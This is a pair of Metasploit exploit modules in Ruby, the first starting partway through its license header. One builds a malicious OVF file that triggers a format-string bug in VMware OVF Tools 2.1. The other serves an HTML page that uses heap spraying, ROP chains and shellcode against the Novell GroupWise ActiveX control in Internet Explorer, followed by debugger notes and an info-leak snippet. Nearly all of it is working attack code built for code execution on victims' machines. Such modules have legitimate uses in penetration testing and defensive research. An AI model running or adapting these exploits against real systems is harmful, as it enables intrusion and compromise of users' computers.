# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking
 
	include Msf::Exploit::FILEFORMAT
 
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'VMWare OVF Tools Format String Vulnerability',
			'Description'    => %q{
					This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for
				Windows. The vulnerability occurs when printing error messages while parsing a
				a malformed OVF file. The module has been tested successfully with VMWare OVF Tools
				2.1 on Windows XP SP3.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Jeremy Brown', # Vulnerability discovery
					'juan vazquez'  # Metasploit Module
				],
			'References'     =>
				[
					[ 'CVE', '2012-3569' ],
					[ 'OSVDB', '87117' ],
					[ 'BID', '56468' ],
					[ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ]
				],
			'Payload'        =>
				{
					'DisableNops'    => true,
					'BadChars'       =>
						(0x00..0x08).to_a.pack("C*") +
						"\x0b\x0c\x0e\x0f" +
						(0x10..0x1f).to_a.pack("C*") +
						(0x80..0xff).to_a.pack("C*") +
						"\x22",
					'StackAdjustment' => -3500,
					'PrependEncoder' => "\x54\x59", # push esp # pop ecx
					'EncoderOptions' =>
						{
							'BufferRegister' => 'ECX',
							'BufferOffset' => 6
						}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# vmware-ovftool-2.1.0-467744-win-i386.msi
					[ 'VMWare OVF Tools 2.1 on Windows XP SP3',
						{
							'Ret' => 0x7852753d,  # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1
							'AddrPops' => 98,
							'StackPadding' => 38081,
							'Alignment' => 4096
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Nov 08 2012',
			'DefaultTarget'  => 0))
 
		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.',  'msf.ovf']),
			], self.class)
	end
 
	def ovf
		my_payload = rand_text_alpha(4) # ebp
		my_payload << [target.ret].pack("V") # eip # call esp
		my_payload << payload.encoded
 
		fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000)
		fs << rand_text_alpha(target['Alignment']) # Align to 0x11000
		fs << my_payload
		# 65536 => 0x10000
		# 27    => Error message prefix length
		fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8))
		fs << "%08x" * target['AddrPops'] # Reach saved EBP
		fs << "%hn" # Overwrite LSW of saved EBP with 0x1000
 
		ovf_file = <<-EOF
<?xml version="1.0" encoding="UTF-8"?>
<Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1"
xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common"
xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1"
xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData"
xmlns:vmw="http://www.vmware.com/schema/ovf"
xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
	<References>
		<File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" />
	</References>
	<DiskSection>
		<Info>Virtual disk information</Info>
		<Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" />
	</DiskSection>
	<VirtualSystem ovf:id="Small VM">
		<Info>A virtual machine</Info>
	</VirtualSystem>
</Envelope>
		EOF
		ovf_file
	end
 
	def exploit
		print_status("Creating '#{datastore['FILENAME']}'. This files should be opened with VMMWare OVF 2.1")
		file_create(ovf)
	end
end

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking
 
	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::RopDb
	include Msf::Exploit::Remote::BrowserAutopwn
 
	autopwn_info({
		:ua_name    => HttpClients::IE,
		:ua_minver  => "6.0",
		:ua_maxver  => "9.0",
		:javascript => true,
		:os_name    => OperatingSystems::WINDOWS,
		:rank       => NormalRanking,
		:classid    => "{601D7813-408F-11D1-98D7-444553540000}",
		:method     => "SetEngine"
	})
 
 
	def initialize(info={})
		super(update_info(info,
			'Name'           => "Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",
			'Description'    => %q{
					This module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll
				ActiveX. Several methods in the GWCalServer control use user provided data as
				a pointer, which allows to read arbitrary memory and execute arbitrary code. This
				module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The
				JRE6 needs to be installed to achieve ASLR bypass.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'rgod <rgod[at]autistici.org>', # Vulnerability discovery
					'juan vazquez'                  # Metasploit module
				],
			'References'     =>
				[
					[ 'CVE', '2012-0439' ],
					[ 'OSVDB', '89700' ],
					[ 'BID' , '57658' ],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-008' ],
					[ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011688' ]
				],
			'Payload'        =>
				{
					'BadChars'    => "\x00",
					'Space'       => 1040,
					'DisableNops' => true
				},
			'DefaultOptions'  =>
				{
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# gwcls1.dll 12.0.0.8586
					[ 'Automatic', {} ],
					[ 'IE 6 on Windows XP SP3', { 'Rop' => nil,     'Offset' => '0x5F4' } ],
					[ 'IE 7 on Windows XP SP3', { 'Rop' => nil,     'Offset' => '0x5F4' } ],
					[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x3e3' } ],
					[ 'IE 7 on Windows Vista',  { 'Rop' => nil,     'Offset' => '0x5f4' } ],
					[ 'IE 8 on Windows Vista',  { 'Rop' => :jre,    'Offset' => '0x3e3' } ],
					[ 'IE 8 on Windows 7',      { 'Rop' => :jre,    'Offset' => '0x3e3' } ],
					[ 'IE 9 on Windows 7',      { 'Rop' => :jre,    'Offset' => '0x3ed' } ]#'0x5fe' } ]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Jan 30 2013",
			'DefaultTarget'  => 0))
 
		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
			], self.class)
 
	end
 
	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'
 
		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
		ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
 
		ie_name = "IE #{ie}"
 
		case nt
		when '5.1'
			os_name = 'Windows XP SP3'
		when '6.0'
			os_name = 'Windows Vista'
		when '6.1'
			os_name = 'Windows 7'
		end
 
		targets.each do |t|
			if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
				print_status("Target selected as: #{t.name}")
				return t
			end
		end
 
		return nil
	end
 
	def ie_heap_spray(my_target, p)
		js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
		js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
 
		# Land the payload at 0x0c0c0c0c
		case my_target
		when targets[7]
			# IE 9 on Windows 7
			js = %Q|
			function randomblock(blocksize)
			{
				var theblock = "";
				for (var i = 0; i < blocksize; i++)
				{
					theblock += Math.floor(Math.random()*90)+10;
				}
				return theblock;
			}
 
			function tounescape(block)
			{
				var blocklen = block.length;
				var unescapestr = "";
				for (var i = 0; i < blocklen-1; i=i+4)
				{
					unescapestr += "%u" + block.substring(i,i+4);
				}
				return unescapestr;
			}
 
			var heap_obj = new heapLib.ie(0x10000);
			var code = unescape("#{js_code}");
			var nops = unescape("#{js_random_nops}");
			while (nops.length < 0x80000) nops += nops;
			var offset_length = #{my_target['Offset']};
			for (var i=0; i < 0x1000; i++) {
				var padding = unescape(tounescape(randomblock(0x1000)));
				while (padding.length < 0x1000) padding+= padding;
				var junk_offset = padding.substring(0, offset_length);
				var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
				while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
				sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
				heap_obj.alloc(sprayblock);
			}
			|
 
		else
			# For IE 6, 7, 8
			js = %Q|
			var heap_obj = new heapLib.ie(0x20000);
			var code = unescape("#{js_code}");
			var nops = unescape("#{js_nops}");
			while (nops.length < 0x80000) nops += nops;
			var offset = nops.substring(0, #{my_target['Offset']});
			var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
			while (shellcode.length < 0x40000) shellcode += shellcode;
			var block = shellcode.substring(0, (0x80000-6)/2);
			heap_obj.gc();
			for (var i=1; i < 0x300; i++) {
				heap_obj.alloc(block);
			}
			var overflow = nops.substring(0, 10);
			|
 
		end
 
		js = heaplib(js, {:noobfu => true})
 
		if datastore['OBFUSCATE']
			js = ::Rex::Exploitation::JSObfu.new(js)
			js.obfuscate
		end
 
		return js
	end
 
	def stack_pivot
		pivot = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18 # get teb
		pivot << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
		pivot << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
		pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
		return pivot
	end
 
	def get_payload(t, cli)
		code = payload.encoded
 
		# No rop. Just return the payload.
		return [0x0c0c0c10 - 0x426].pack("V") + [0x0c0c0c14].pack("V") + code if t['Rop'].nil?
 
		# Both ROP chains generated by mona.py - See corelan.be
		case t['Rop']
			when :msvcrt
				print_status("Using msvcrt ROP")
				rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea
				jmp_shell = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{0x0c0c0c14 - 0x0c0c07ea - rop_payload.length}").encode_string
				rop_payload << jmp_shell
				rop_payload << rand_text_alpha(0x0c0c0c0c - 0x0c0c07ea- rop_payload.length)
				rop_payload << [0x0c0c0c10 - 0x426].pack("V")  # Mapped at 0x0c0c0c0c # 0x426 => vtable offset
				rop_payload << [0x77c15ed5].pack("V")          # Mapped at 0x0c0c0c10 # xchg eax, esp # ret
				rop_payload << stack_pivot
				rop_payload << code
			else
				print_status("Using JRE ROP")
				rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea
				jmp_shell = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{0x0c0c0c14 - 0x0c0c07ea - rop_payload.length}").encode_string
				rop_payload << jmp_shell
				rop_payload << rand_text_alpha(0x0c0c0c0c - 0x0c0c07ea- rop_payload.length)
				rop_payload << [0x0c0c0c10 - 0x426].pack("V")  # Mapped at 0x0c0c0c0c # 0x426 => vtable offset
				rop_payload << [0x7C348B05].pack("V")          # Mapped at 0x0c0c0c10 # xchg eax, esp # ret
				rop_payload << stack_pivot
				rop_payload << code
		end
 
		return rop_payload
	end
 
 
	def load_exploit_html(my_target, cli)
		p  = get_payload(my_target, cli)
		js = ie_heap_spray(my_target, p)
 
		trigger = "target.GetNXPItem(\"22/10/2013\", 1, 1);" * 200
 
		html = %Q|
		<html>
		<head>
		<script>
		#{js}
		</script>
		</head>
		<body>
		<object classid='clsid:601D7813-408F-11D1-98D7-444553540000' id ='target'>
		</object>
		<script>
			target.SetEngine(0x0c0c0c0c-0x20);
			setInterval(function(){#{trigger}},1000);
		</script>
		</body>
		</html>
		|
 
		return html
	end
 
	def on_request_uri(cli, request)
		agent = request.headers['User-Agent']
		uri   = request.uri
		print_status("Requesting: #{uri}")
 
		my_target = get_target(agent)
		# Avoid the attack if no suitable target found
		if my_target.nil?
			print_error("Browser not supported, sending 404: #{agent}")
			send_not_found(cli)
			return
		end
 
		html = load_exploit_html(my_target, cli)
		html = html.gsub(/^\t\t/, '')
		print_status("Sending HTML...")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end
 
end
 
 
=begin
 
* Remote Code Exec
 
(240.8d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\Novell\GROUPW~1\gwenv1.dll -
eax=00000000 ebx=0c0c0bec ecx=030c2998 edx=030c2998 esi=0c0c0bec edi=0013df58
eip=10335e2d esp=0013de04 ebp=0013de8c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
gwenv1!NgwOFErrorEnabledVector<NgwOFAttribute>::SetParent+0x326b9d:
10335e2d 8a8e4f040000    mov     cl,byte ptr [esi+44Fh]     ds:0023:0c0c103b=??
 
 
.text:103BDDEC                 mov     eax, [ebp+var_4] // var_4 => Engine + 0x20
.text:103BDDEF                 test    esi, esi
.text:103BDDF1                 jnz     short loc_103BDE17
.text:103BDDF3                 cmp     [eax+426h], esi
.text:103BDDF9                 jz      short loc_103BDE17 // Check function pointer against nil?
.text:103BDDFB                 mov     ecx, [ebp+arg_8]
.text:103BDDFE                 mov     edx, [ebp+arg_4]
.text:103BDE01                 push    ecx
.text:103BDE02                 mov     ecx, [eax+42Ah]  // Carefully crafted object allows to control it
.text:103BDE08                 push    edx
.text:103BDE09                 mov     edx, [eax+426h] // Carefully crafted object allows to control it
.text:103BDE0F                 push    ecx
.text:103BDE10                 call    edx  // Win!
 
* Info Leak
 
// Memory disclosure => 4 bytes from an arbitrary address
// Unstable when info leaking and triggering rce path...
target.SetEngine(0x7ffe0300-0x45c); // Disclosing ntdll
var leak = target.GetMiscAccess();
alert(leak);
 
=end